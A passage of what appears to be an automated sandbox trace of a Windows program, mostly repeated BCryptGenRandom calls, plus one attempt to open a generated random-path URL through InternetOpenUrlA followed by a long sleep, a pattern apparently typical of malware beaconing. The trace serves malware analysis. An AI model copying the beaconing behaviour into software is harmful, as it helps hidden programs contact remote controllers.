pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4956, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d4956) returned 0x0 [0255.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d496d, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4d496d) returned 0x0 [0255.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.785] GetProcessHeap () returned 0x440000 [0255.785] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0255.785] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0255.785] lstrcatA (in: lpString1="\x81\x03", lpString2="/bL3p0bfR3e3o6kkc4ilaUxgpn6uharm0op127c53ptavhjg/o7m7gwnn058h4BgNulgfhfcc8jFjuhg6Zptk/d86broFhwa5uPllc8ezxuk/Q0oWjNiwhssZrUyuvl/" | out: lpString1="\x81\x03/bL3p0bfR3e3o6kkc4ilaUxgpn6uharm0op127c53ptavhjg/o7m7gwnn058h4BgNulgfhfcc8jFjuhg6Zptk/d86broFhwa5uPllc8ezxuk/Q0oWjNiwhssZrUyuvl/") returned="\x81\x03/bL3p0bfR3e3o6kkc4ilaUxgpn6uharm0op127c53ptavhjg/o7m7gwnn058h4BgNulgfhfcc8jFjuhg6Zptk/d86broFhwa5uPllc8ezxuk/Q0oWjNiwhssZrUyuvl/" [0255.786] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0255.786] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/bL3p0bfR3e3o6kkc4ilaUxgpn6uharm0op127c53ptavhjg/o7m7gwnn058h4BgNulgfhfcc8jFjuhg6Zptk/d86broFhwa5uPllc8ezxuk/Q0oWjNiwhssZrUyuvl/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0255.786] GetProcessHeap () returned 0x440000 [0255.786] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0255.786] GetProcessHeap () returned 0x440000 [0255.786] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4900 | out: hHeap=0x440000) returned 1 [0255.786] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0255.787] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0255.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0255.787] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0255.787] Sleep (dwMilliseconds=0x144d9) [0255.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0255.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.965] GetProcessHeap () returned 0x440000 [0255.965] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16c60 [0255.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16c61, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a16c61) returned 0x0 [0255.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16c88, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a16c88) returned 0x0 [0255.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.972] GetProcAddress 